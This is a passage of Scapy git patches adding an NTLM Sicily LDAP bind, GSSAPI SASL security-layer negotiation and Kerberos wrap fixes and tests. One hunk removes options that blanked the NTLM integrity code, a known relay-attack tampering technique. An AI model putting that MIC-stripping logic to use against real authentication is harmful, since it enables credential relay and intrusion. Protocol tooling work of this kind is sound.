authentication=LDAP_Authentication_sicilyPackageDiscovery(b""), + ) + ) + if resp.protocolOp.resultCode != 0: + resp.show() + raise RuntimeError("Sicily package discovery failed !") + # 2. First exchange: Negotiate + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( + self.sspcontext, + req_flags=( + GSS_C_FLAGS.GSS_C_REPLAY_FLAG + | GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG + | GSS_C_FLAGS.GSS_C_MUTUAL_FLAG + | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.sign else 0) + | (GSS_C_FLAGS.GSS_C_CONF_FLAG if self.encrypt else 0) + ), + ) + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b"NTLM"), + authentication=LDAP_Authentication_sicilyNegotiate( + bytes(token), + ), + ) + ) + val = resp.protocolOp.serverCreds + if not val: + resp.show() + raise RuntimeError("Sicily negotiate failed !") + # 3. Second exchange: Response + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( + self.sspcontext, GSSAPI_BLOB(val) + ) + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b"NTLM"), + authentication=LDAP_Authentication_sicilyResponse( + bytes(token), + ), + ) + ) + if resp.protocolOp.resultCode != 0: + resp.show() + raise RuntimeError("Sicily response failed !") elif self.mech in [ LDAP_BIND_MECHS.SASL_GSS_SPNEGO, LDAP_BIND_MECHS.SASL_GSSAPI, ]: # GSSAPI or SPNEGO self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( - self.sspcontext, None + self.sspcontext, + req_flags=( + GSS_C_FLAGS.GSS_C_REPLAY_FLAG + | GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG + | GSS_C_FLAGS.GSS_C_MUTUAL_FLAG + | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.sign else 0) + | (GSS_C_FLAGS.GSS_C_CONF_FLAG if self.encrypt else 0) + ), ) while token: resp = self.sr1( @@ -1028,21 +1278,70 @@ def bind(self, simple_username=None, simple_password=None): ), ) ) + if not isinstance(resp.protocolOp, LDAP_BindResponse): + if self.verb: + print("%s bind failed !" % self.mech.name) + resp.show() + return + val = resp.protocolOp.serverSaslCredsData + if not val: + status = resp.protocolOp.resultCode + break self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( - self.sspcontext, GSSAPI_BLOB(resp.protocolOp.serverSaslCreds.val) + self.sspcontext, GSSAPI_BLOB(val) ) - if self.mech == LDAP_BIND_MECHS.SASL_GSSAPI and status == GSS_S_COMPLETE: - # https://datatracker.ietf.org/doc/html/rfc2222#section-7.2.1 - resp = self.sr1( - LDAP_BindRequest( - bind_name=ASN1_STRING(b""), - authentication=LDAP_Authentication_SaslCredentials( - mechanism=ASN1_STRING(self.mech.value), - credentials=ASN1_STRING(token or b""), - ), - ) + if status != GSS_S_COMPLETE: + raise RuntimeError("%s bind returned %s !" % (self.mech.name, status)) + elif self.mech == LDAP_BIND_MECHS.SASL_GSSAPI: + # GSSAPI has 2 extra exchanges + # https://datatracker.ietf.org/doc/html/rfc2222#section-7.2.1 + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b""), + authentication=LDAP_Authentication_SaslCredentials( + mechanism=ASN1_STRING(self.mech.value), + credentials=None, + ), ) + ) + # Parse server-supported layers + saslOptions = GSSAPI_BLOB_SIGNATURE(resp.protocolOp.serverSaslCredsData) + saslOptions.show() + saslOptions = LDAP_SASL_GSSAPI_SsfCap( + self.ssp.GSS_Unwrap(self.sspcontext, b"", saslOptions) + ) + if self.sign and not saslOptions.supported_security_layers.INTEGRITY: + raise RuntimeError("GSSAPI SASL failed to negotiate INTEGRITY !") + if ( + self.encrypt + and not saslOptions.supported_security_layers.CONFIDENTIALITY + ): + raise RuntimeError("GSSAPI SASL failed to negotiate CONFIDENTIALITY !") + # Announce client-supported layers + saslOptions = LDAP_SASL_GSSAPI_SsfCap( + supported_security_layers=( + "NONE" + + ("+INTEGRITY" if self.sign else "") + + ("+CONFIDENTIALITY" if self.encrypt else "") + ), + max_output_token_size=0xA00000, + ) + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b""), + authentication=LDAP_Authentication_SaslCredentials( + mechanism=ASN1_STRING(self.mech.value), + credentials=self.ssp.GSS_Wrap( + self.sspcontext, bytes(saslOptions), False + )[1], + ), + ) + ) + if resp.protocolOp.resultCode != 0: resp.show() + raise RuntimeError( + "GSSAPI SASL failed to negotiate client security flags !" + ) if self.verb: print("%s bind succeeded !" % self.mech.name) diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index c77792b421a..a20f1aa32f7 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -338,7 +338,7 @@ def GSS_Init_sec_context( def GSS_Accept_sec_context(self, Context, val=None): if Context is None: - Context = self.CONTEXT(False) + Context = self.CONTEXT(False, req_flags=0) if Context.state == self.STATE.INIT: Context.state = self.STATE.SRV_SENT_NL diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index eac32280f7a..197b4937bbb 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -7,6 +7,10 @@ NTLM This is documented in [MS-NLMP] + +.. note:: + You will find more complete documentation for this layer over at + `GSSAPI `_ """ import copy @@ -483,41 +487,49 @@ class _NTLM_Version(Packet): class NTLM_NEGOTIATE(_NTLMPayloadPacket): name = "NTLM Negotiate" MessageType = 1 - OFFSET = lambda pkt: ( - ((pkt.DomainNameBufferOffset or 40) > 32) and 40 or 32 - ) - fields_desc = [ - NTLM_Header, - FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), - # DomainNameFields - LEShortField("DomainNameLen", None), - LEShortField("DomainNameMaxLen", None), - LEIntField("DomainNameBufferOffset", None), - # WorkstationFields - LEShortField("WorkstationNameLen", None), - LEShortField("WorkstationNameMaxLen", None), - LEIntField("WorkstationNameBufferOffset", None), - ] + [ - # VERSION - ConditionalField( - # (not present on some old Windows versions. We use a heuristic) - x, - lambda pkt: ( - ( - 40 if pkt.DomainNameBufferOffset is None else - pkt.DomainNameBufferOffset or len(pkt.original or b"") - ) > 32 + OFFSET = lambda pkt: (((pkt.DomainNameBufferOffset or 40) > 32) and 40 or 32) + fields_desc = ( + [ + NTLM_Header, + FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), + # DomainNameFields + LEShortField("DomainNameLen", None), + LEShortField("DomainNameMaxLen", None), + LEIntField("DomainNameBufferOffset", None), + # WorkstationFields + LEShortField("WorkstationNameLen", None), + LEShortField("WorkstationNameMaxLen", None), + LEIntField("WorkstationNameBufferOffset", None), + ] + + [ + # VERSION + ConditionalField( + # (not present on some old Windows versions. We use a heuristic) + x, + lambda pkt: ( + ( + 40 + if pkt.DomainNameBufferOffset is None + else pkt.DomainNameBufferOffset or len(pkt.original or b"") + ) + > 32 + ) + or pkt.fields.get(x.name, b""), ) - or pkt.fields.get(x.name, b""), - ) for x in _NTLM_Version.fields_desc - ] + [ - # Payload - _NTLMPayloadField( - "Payload", - OFFSET, - [_NTLMStrField("DomainName", b""), _NTLMStrField("WorkstationName", b"")], - ), - ] + for x in _NTLM_Version.fields_desc + ] + + [ + # Payload + _NTLMPayloadField( + "Payload", + OFFSET, + [ + _NTLMStrField("DomainName", b""), + _NTLMStrField("WorkstationName", b""), + ], + ), + ] + ) def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes @@ -615,42 +627,45 @@ def default_payload_class(self, payload): class NTLM_CHALLENGE(_NTLMPayloadPacket): name = "NTLM Challenge" MessageType = 2 - OFFSET = lambda pkt: ( - ((pkt.TargetInfoBufferOffset or 56) > 48) and 56 or 48 + OFFSET = lambda pkt: (((pkt.TargetInfoBufferOffset or 56) > 48) and 56 or 48) + fields_desc = ( + [ + NTLM_Header, + # TargetNameFields + LEShortField("TargetNameLen", None), + LEShortField("TargetNameMaxLen", None), + LEIntField("TargetNameBufferOffset", None), + # + FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), + XStrFixedLenField("ServerChallenge", None, length=8), + XStrFixedLenField("Reserved", None, length=8), + # TargetInfoFields + LEShortField("TargetInfoLen", None), + LEShortField("TargetInfoMaxLen", None), + LEIntField("TargetInfoBufferOffset", None), + ] + + [ + # VERSION + ConditionalField( + # (not present on some old Windows versions. We use a heuristic) + x, + lambda pkt: ((pkt.TargetInfoBufferOffset or 56) > 40) + or pkt.fields.get(x.name, b""), + ) + for x in _NTLM_Version.fields_desc + ] + + [ + # Payload + _NTLMPayloadField( + "Payload", + OFFSET, + [ + _NTLMStrField("TargetName", b""), + PacketListField("TargetInfo", [AV_PAIR()], AV_PAIR), + ], + ), + ] ) - fields_desc = [ - NTLM_Header, - # TargetNameFields - LEShortField("TargetNameLen", None), - LEShortField("TargetNameMaxLen", None), - LEIntField("TargetNameBufferOffset", None), - # - FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), - XStrFixedLenField("ServerChallenge", None, length=8), - XStrFixedLenField("Reserved", None, length=8), - # TargetInfoFields - LEShortField("TargetInfoLen", None), - LEShortField("TargetInfoMaxLen", None), - LEIntField("TargetInfoBufferOffset", None), - ] + [ - # VERSION - ConditionalField( - # (not present on some old Windows versions. We use a heuristic) - x, - lambda pkt: ((pkt.TargetInfoBufferOffset or 56) > 40) - or pkt.fields.get(x.name, b""), - ) for x in _NTLM_Version.fields_desc - ] + [ - # Payload - _NTLMPayloadField( - "Payload", - OFFSET, - [ - _NTLMStrField("TargetName", b""), - PacketListField("TargetInfo", [AV_PAIR()], AV_PAIR), - ], - ), - ] def getAv(self, AvId): try: @@ -756,89 +771,99 @@ class NTLM_AUTHENTICATE(_NTLMPayloadPacket): MessageType = 3 NTLM_VERSION = 1 OFFSET = lambda pkt: ( - ((pkt.DomainNameBufferOffset or 88) <= 64) and 64 + ((pkt.DomainNameBufferOffset or 88) <= 64) + and 64 or (((pkt.DomainNameBufferOffset or 88) > 72) and 88 or 72) ) - fields_desc = [ - NTLM_Header, - # LmChallengeResponseFields - LEShortField("LmChallengeResponseLen", None), - LEShortField("LmChallengeResponseMaxLen", None), - LEIntField("LmChallengeResponseBufferOffset", None), - # NtChallengeResponseFields - LEShortField("NtChallengeResponseLen", None), - LEShortField("NtChallengeResponseMaxLen", None), - LEIntField("NtChallengeResponseBufferOffset", None), - # DomainNameFields - LEShortField("DomainNameLen", None), - LEShortField("DomainNameMaxLen", None), - LEIntField("DomainNameBufferOffset", None), - # UserNameFields - LEShortField("UserNameLen", None), - LEShortField("UserNameMaxLen", None), - LEIntField("UserNameBufferOffset", None), - # WorkstationFields - LEShortField("WorkstationLen", None), - LEShortField("WorkstationMaxLen", None), - LEIntField("WorkstationBufferOffset", None), - # EncryptedRandomSessionKeyFields - LEShortField("EncryptedRandomSessionKeyLen", None), - LEShortField("EncryptedRandomSessionKeyMaxLen", None), - LEIntField("EncryptedRandomSessionKeyBufferOffset", None), - # NegotiateFlags - FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), - # VERSION - ] + [ - ConditionalField( - # (not present on some old Windows versions. We use a heuristic) - x, - lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 64) - or pkt.fields.get(x.name, b""), - ) for x in _NTLM_Version.fields_desc - ] + [ - # MIC - ConditionalField( - # (not present on some old Windows versions. We use a heuristic) - XStrFixedLenField("MIC", b"", length=16), - lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 72) - or pkt.fields.get("MIC", b""), - ), - # Payload - _NTLMPayloadField( - "Payload", - OFFSET, - [ - MultipleTypeField( - [ - ( - PacketField( - "LmChallengeResponse", LMv2_RESPONSE(), LMv2_RESPONSE - ), - lambda pkt: pkt.NTLM_VERSION == 2, - ) - ], - PacketField("LmChallengeResponse", LM_RESPONSE(), LM_RESPONSE), - ), - MultipleTypeField( - [ - ( - PacketField( - "NtChallengeResponse", - NTLMv2_RESPONSE(), - NTLMv2_RESPONSE, - ), - lambda pkt: pkt.NTLM_VERSION == 2, - ) - ], - PacketField("NtChallengeResponse", NTLM_RESPONSE(), NTLM_RESPONSE), - ), - _NTLMStrField("DomainName", b""), - _NTLMStrField("UserName", b""), - _NTLMStrField("Workstation", b""), - XStrField("EncryptedRandomSessionKey", b""), - ], - ), - ] + fields_desc = ( + [ + NTLM_Header, + # LmChallengeResponseFields + LEShortField("LmChallengeResponseLen", None), + LEShortField("LmChallengeResponseMaxLen", None), + LEIntField("LmChallengeResponseBufferOffset", None), + # NtChallengeResponseFields + LEShortField("NtChallengeResponseLen", None), + LEShortField("NtChallengeResponseMaxLen", None), + LEIntField("NtChallengeResponseBufferOffset", None), + # DomainNameFields + LEShortField("DomainNameLen", None), + LEShortField("DomainNameMaxLen", None), + LEIntField("DomainNameBufferOffset", None), + # UserNameFields + LEShortField("UserNameLen", None), + LEShortField("UserNameMaxLen", None), + LEIntField("UserNameBufferOffset", None), + # WorkstationFields + LEShortField("WorkstationLen", None), + LEShortField("WorkstationMaxLen", None), + LEIntField("WorkstationBufferOffset", None), + # EncryptedRandomSessionKeyFields + LEShortField("EncryptedRandomSessionKeyLen", None), + LEShortField("EncryptedRandomSessionKeyMaxLen", None), + LEIntField("EncryptedRandomSessionKeyBufferOffset", None), + # NegotiateFlags + FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), + # VERSION + ] + + [ + ConditionalField( + # (not present on some old Windows versions. We use a heuristic) + x, + lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 64) + or pkt.fields.get(x.name, b""), + ) + for x in _NTLM_Version.fields_desc + ] + + [ + # MIC + ConditionalField( + # (not present on some old Windows versions. We use a heuristic) + XStrFixedLenField("MIC", b"", length=16), + lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 72) + or pkt.fields.get("MIC", b""), + ), + # Payload + _NTLMPayloadField( + "Payload", + OFFSET, + [ + MultipleTypeField( + [ + ( + PacketField( + "LmChallengeResponse", + LMv2_RESPONSE(), + LMv2_RESPONSE, + ), + lambda pkt: pkt.NTLM_VERSION == 2, + ) + ], + PacketField("LmChallengeResponse", LM_RESPONSE(), LM_RESPONSE), + ), + MultipleTypeField( + [ + ( + PacketField( + "NtChallengeResponse", + NTLMv2_RESPONSE(), + NTLMv2_RESPONSE, + ), + lambda pkt: pkt.NTLM_VERSION == 2, + ) + ], + PacketField( + "NtChallengeResponse", NTLM_RESPONSE(), NTLM_RESPONSE + ), + ), + _NTLMStrField("DomainName", b""), + _NTLMStrField("UserName", b""), + _NTLMStrField("Workstation", b""), + XStrField("EncryptedRandomSessionKey", b""), + ], + ), + ] + ) def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes @@ -1202,8 +1227,6 @@ def __init__( COMPUTER_NB_NAME="SRV", COMPUTER_FQDN=None, IDENTITIES=None, - DROP_MIC_v1=False, - DROP_MIC_v2=False, DO_NOT_CHECK_LOGIN=False, SERVER_CHALLENGE=None, **kwargs, @@ -1222,8 +1245,6 @@ def __init__( ) self.IDENTITIES = IDENTITIES self.DO_NOT_CHECK_LOGIN = DO_NOT_CHECK_LOGIN - self.DROP_MIC_v1 = DROP_MIC_v1 - self.DROP_MIC_v2 = DROP_MIC_v2 self.SERVER_CHALLENGE = SERVER_CHALLENGE super(NTLMSSP, self).__init__(**kwargs) @@ -1324,8 +1345,9 @@ def verifyMechListMIC(self, Context, otherMIC, input): finally: Context.RecvSealHandle = OriginalHandle - def GSS_Init_sec_context(self, Context: CONTEXT, val=None, - req_flags: Optional[GSS_C_FLAGS] = None): + def GSS_Init_sec_context( + self, Context: CONTEXT, val=None, req_flags: Optional[GSS_C_FLAGS] = None + ): if Context is None: Context = self.CONTEXT(False, req_flags=req_flags) @@ -1337,8 +1359,6 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None, [ "NEGOTIATE_UNICODE", "REQUEST_TARGET", - "NEGOTIATE_SIGN", - "NEGOTIATE_SEAL", "NEGOTIATE_NTLM", "NEGOTIATE_ALWAYS_SIGN", "TARGET_TYPE_DOMAIN", @@ -1346,9 +1366,30 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None, "NEGOTIATE_TARGET_INFO", "NEGOTIATE_VERSION", "NEGOTIATE_128", - "NEGOTIATE_KEY_EXCH", "NEGOTIATE_56", ] + + ( + [ + "NEGOTIATE_KEY_EXCH", + ] + if Context.flags + & (GSS_C_FLAGS.GSS_C_INTEG_FLAG | GSS_C_FLAGS.GSS_C_CONF_FLAG) + else [] + ) + + ( + [ + "NEGOTIATE_SIGN", + ] + if Context.flags & GSS_C_FLAGS.GSS_C_INTEG_FLAG + else [] + ) + + ( + [ + "NEGOTIATE_SEAL", + ] + if Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG + else [] + ) ), ProductMajorVersion=10, ProductMinorVersion=0, @@ -1388,6 +1429,7 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None, ) tok.LmChallengeResponse = LMv2_RESPONSE() from scapy.layers.kerberos import _parse_upn + try: tok.UserName, realm = _parse_upn(self.UPN) except ValueError: @@ -1445,23 +1487,6 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None, ]: if key in self.NTLM_VALUES: setattr(tok, key, self.NTLM_VALUES[key]) - if self.DROP_MIC_v1 or self.DROP_MIC_v2: - tok.MIC = b"\0" * 16 - tok.NtChallengeResponseLen = None - tok.NtChallengeResponseMaxLen = None - tok.EncryptedRandomSessionKeyBufferOffset = None - if self.DROP_MIC_v2: - ChallengeResponse = next( - v[1] for v in tok.Payload if v[0] == "NtChallengeResponse" - ) - i = next( - i - for i, k in enumerate(ChallengeResponse.AvPairs) - if k.AvId == 0x0006 - ) - ChallengeResponse.AvPairs.insert( - i + 1, AV_PAIR(AvId="MsvAvFlags", Value=0) - ) # Compute the ResponseKeyNT ResponseKeyNT = NTOWFv2( None, @@ -1519,7 +1544,7 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None, def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if Context is None: - Context = self.CONTEXT(True) + Context = self.CONTEXT(IsAcceptor=True, req_flags=0) if Context.state == self.STATE.INIT: # Server: challenge (val=negotiate) @@ -1535,18 +1560,26 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): [ "NEGOTIATE_UNICODE", "REQUEST_TARGET", - "NEGOTIATE_SIGN", - "NEGOTIATE_SEAL", "NEGOTIATE_NTLM", "NEGOTIATE_ALWAYS_SIGN", - "TARGET_TYPE_DOMAIN", "NEGOTIATE_EXTENDED_SESSIONSECURITY", "NEGOTIATE_TARGET_INFO", + "TARGET_TYPE_DOMAIN", "NEGOTIATE_VERSION", "NEGOTIATE_128", "NEGOTIATE_KEY_EXCH", "NEGOTIATE_56", ] + + ( + ["NEGOTIATE_SIGN"] + if nego_tok.NegotiateFlags.NEGOTIATE_SIGN + else [] + ) + + ( + ["NEGOTIATE_SEAL"] + if nego_tok.NegotiateFlags.NEGOTIATE_SEAL + else [] + ) ), ProductMajorVersion=10, ProductMinorVersion=0, @@ -1645,6 +1678,11 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): ) Context.RecvSealHandle = RC4Init(Context.RecvSealKey) if self._checkLogin(Context, auth_tok): + # Set negotiated flags + if auth_tok.NegotiateFlags.NEGOTIATE_SIGN: + Context.flags |= GSS_C_FLAGS.GSS_C_INTEG_FLAG + if auth_tok.NegotiateFlags.NEGOTIATE_SEAL: + Context.flags |= GSS_C_FLAGS.GSS_C_CONF_FLAG return Context, None, GSS_S_COMPLETE # Bad NTProofStr or unknown user Context.SessionKey = None diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index bafb790bd31..34c1c1f1771 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -8,6 +8,7 @@ SMB (Server Message Block), also known as CIFS. Specs: + - [MS-CIFS] (base) - [MS-SMB] (extension of CIFS - SMB v1) """ diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index f2a567bbb54..395383fbd45 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -5,6 +5,10 @@ """ SMB (Server Message Block), also known as CIFS - version 2 + +.. note:: + You will find more complete documentation for this layer over at + `SMB `_ """ import collections diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index efee30ae548..09885f548aa 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -5,6 +5,11 @@ """ SMB 1 / 2 Client Automaton + + +.. note:: + You will find more complete documentation for this layer over at + `SMB `_ """ import io @@ -33,6 +38,7 @@ from scapy.layers.gssapi import ( GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, + GSS_C_FLAGS, ) from scapy.layers.inet6 import Net6 from scapy.layers.kerberos import ( @@ -275,7 +281,14 @@ def on_negotiate_smb2(self): @ATMT.state() def NEGOTIATED(self, ssp_blob=None): - ssp_tuple = self.ssp.GSS_Init_sec_context(self.sspcontext, ssp_blob) + ssp_tuple = self.ssp.GSS_Init_sec_context( + self.sspcontext, + ssp_blob, + req_flags=( + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG + | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.SecurityMode != 0 else 0) + ), + ) return ssp_tuple # DEV: add a condition on NEGOTIATED with prio=0 diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index 3e812f86829..f3310fab340 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -11,6 +11,10 @@ - host a DCE/RPC server This is a Scapy Automaton that is supposedly easily extendable. + +.. note:: + You will find more complete documentation for this layer over at + `SMB `_ """ import functools diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index b47a06f7cde..89197948ec2 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -6,9 +6,14 @@ """ SPNEGO -Implements parts of +Implements parts of: + - GSSAPI SPNEGO: RFC4178 > RFC2478 - GSSAPI SPNEGO NEGOEX: [MS-NEGOEX] + +.. note:: + You will find more complete documentation for this layer over at + `GSSAPI `_ """ import struct @@ -61,6 +66,7 @@ GSS_S_CONTINUE_NEEDED, SSP, _GSSAPI_OIDS, + _GSSAPI_SIGNATURE_OIDS, ) # SSP Providers @@ -237,6 +243,7 @@ class SPNEGO_negToken(ASN1_Packet): # Register for the GSS API Blob _GSSAPI_OIDS["1.3.6.1.5.5.2"] = SPNEGO_negToken +_GSSAPI_SIGNATURE_OIDS["1.3.6.1.5.5.2"] = SPNEGO_negToken def mechListMIC(oids): @@ -492,8 +499,8 @@ class SPNEGOSSP(SSP): ssp = SPNEGOSSP([ NTLMSSP( IDENTITIES={ - "User1": NTOWFv2("Password1", "User1", "DOMAIN"), - "Administrator": NTOWFv2("Password123!", "Administrator", "DOMAIN"), + "User1": MD4le("Password1"), + "Administrator": MD4le("Password123!"), } ), KerberosSSP( @@ -898,7 +905,7 @@ def GSS_Init_sec_context( return self._common_spnego_handler(Context, True, val=val, req_flags=req_flags) def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): - return self._common_spnego_handler(Context, False, val=val) + return self._common_spnego_handler(Context, False, val=val, req_flags=0) def GSS_Passive(self, Context: CONTEXT, val=None): if Context is None: diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 0b7d9b8c05f..500a28d6d21 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -1499,3 +1499,50 @@ with KrbRandomPatcher(): assert negResult == 0 assert tok is None + + += GSS_Wrap/GSS_Unwrap: client sends wrapped payload without confidentiality + +data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" + +edata, sig = client.GSS_Wrap( + clicontext, + data, + conf_req_flag=False, +) +assert edata == b"" +assert sig.TOK_ID == b"\x05\x04" +assert sig.root.Flags == 4 +assert sig.root.EC == 12 +assert sig.root.RRC == 12 +assert bytes(sig) == b'\x05\x04\x04\xff\x00\x0c\x00\x0c\x00\x00\x00\x00@\x00\x00\x00\x8f\x0c\xab\x90h\xc8\xdf1\x078\x03\x0ctestAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE' + +ddata = server.GSS_Unwrap( + srvcontext, + edata, + sig, +) +assert ddata == data + += GSS_Wrap/GSS_Unwrap: server answers back without confidentiality + +data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" + +edata, sig = server.GSS_Wrap( + clicontext, + data, + conf_req_flag=False, +) +assert edata == b"" +assert sig.TOK_ID == b"\x05\x04" +assert sig.root.Flags == 4 +assert sig.root.EC == 12 +assert sig.root.RRC == 12 +assert bytes(sig) == b'\x05\x04\x04\xff\x00\x0c\x00\x0c\x00\x00\x00\x00@\x00\x00\x00\x8f\x0c\xab\x90h\xc8\xdf1\x078\x03\x0ctestAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE' + +ddata = client.GSS_Unwrap( + srvcontext, + edata, + sig, +) +assert ddata == data From d8328901f8256c63e98f77e4aa07581a78a3c8b4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 19 Mar 2024 22:11:37 +0100 Subject: [PATCH 1237/1632] Cosmetic changes to Kerberos and SMB (#4326) --- scapy/layers/kerberos.py | 23 ++++++++++++++--------- scapy/layers/smbclient.py | 19 +++++++++++++++---- 2 files changed, 29 insertions(+), 13 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 2330321081e..e878482c8e7 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -1737,8 +1737,9 @@ def m2i(self, pkt, s): # 24: KDC_ERR_PREAUTH_FAILED # 25: KDC_ERR_PREAUTH_REQUIRED return MethodData(val[0].val, _underlayer=pkt), val[1] - elif pkt.errorCode.val in [18, 41, 60]: + elif pkt.errorCode.val in [18, 29, 41, 60]: # 18: KDC_ERR_CLIENT_REVOKED + # 29: KDC_ERR_SVC_UNAVAILABLE # 41: KRB_AP_ERR_MODIFIED # 60: KRB_ERR_GENERIC return KERB_ERROR_DATA(val[0].val, _underlayer=pkt), val[1] @@ -3309,9 +3310,6 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): """ if Context.KrbSessionKey.etype in [17, 18]: # AES confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG - # Concatenate the data - Data = b"".join(x.data for x in msgs if x.sign or x.conf_req_flag) - DataLen = len(Data) # Build token tok = KRB_InnerToken( TOK_ID=b"\x05\x04", @@ -3327,6 +3325,9 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): if confidentiality: # Confidentiality is requested (see RFC4121 sect 4.3) # {"header" | encrypt(plaintext-data | filler | "header")} + # 0. Concatenate the data + Data = b"".join(x.data for x in msgs if x.conf_req_flag) + DataLen = len(Data) # 1. Add filler tok.root.EC = (-DataLen) % Context.KrbSessionKey.ep.blocksize Data += b"\x00" * tok.root.EC @@ -3350,12 +3351,14 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): msglen = len(msg.data) if msg.conf_req_flag: msg.data = Data[offset : offset + msglen] - if msg.sign or msg.conf_req_flag: offset += msglen return msgs, tok else: # No confidentiality is requested # {"header" | plaintext-data | get_mic(plaintext-data | "header")} + # 0. Concatenate the data + Data = b"".join(x.data for x in msgs if x.sign) + DataLen = len(Data) # 1. Add first 16 octets of the Wrap token "header" ToSign = Data ToSign += bytes(tok)[:16] @@ -3391,10 +3394,10 @@ def GSS_UnwrapEx(self, Context, msgs, signature): if Context.KrbSessionKey.etype in [17, 18]: # AES confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG # Real separation starts now: RFC4121 sect 4.2.4 - # Concatenate the data - Data = signature.root.Data - Data += b"".join(x.data for x in msgs if x.sign or x.conf_req_flag) if confidentiality: + # 0. Concatenate the data + Data = signature.root.Data + Data += b"".join(x.data for x in msgs if x.conf_req_flag) # 1. Un-Rotate Data = strrot(Data, signature.root.RRC + signature.root.EC, right=False) # 2. Decrypt @@ -3418,11 +3421,13 @@ def GSS_UnwrapEx(self, Context, msgs, signature): msglen = len(msg.data) if msg.conf_req_flag: msg.data = Data[offset : offset + msglen] - if msg.sign or msg.conf_req_flag: offset += msglen return msgs else: # No confidentiality is requested + # 0. Concatenate the data + Data = signature.root.Data + Data += b"".join(x.data for x in msgs if x.sign) # 1. Un-Rotate Data = strrot(Data, signature.root.RRC, right=False) # 2. Split diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 09885f548aa..deed13351a7 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -255,6 +255,7 @@ def receive_negotiate_response(self, pkt): else: if SMB2_Negotiate_Protocol_Response in pkt: self.Dialect = pkt.DialectRevision + self.update_smbheader(pkt) raise self.NEGOTIATED(ssp_blob) elif SMBNegotiate_Response_Security in pkt: # Non-extended SMB1 @@ -291,6 +292,19 @@ def NEGOTIATED(self, ssp_blob=None): ) return ssp_tuple + def update_smbheader(self, pkt): + """ + Called when receiving a SMB2 packet to update the current smb_header + """ + # Some values should not be updated when ASYNC + if not pkt.Flags.SMB2_FLAGS_ASYNC_COMMAND: + # [MS-SMB2] sect 3.2.5.1.4 - we charge what we are granted + self.smb_header.CreditCharge = pkt.CreditRequest + # Update IDs + self.smb_header.SessionId = pkt.SessionId + self.smb_header.TID = pkt.TID + self.smb_header.PID = pkt.PID + # DEV: add a condition on NEGOTIATED with prio=0 @ATMT.condition(NEGOTIATED, prio=1) @@ -435,10 +449,7 @@ def incoming_data_received_smb(self, pkt): @ATMT.action(incoming_data_received_smb) def receive_data_smb(self, pkt): - if not 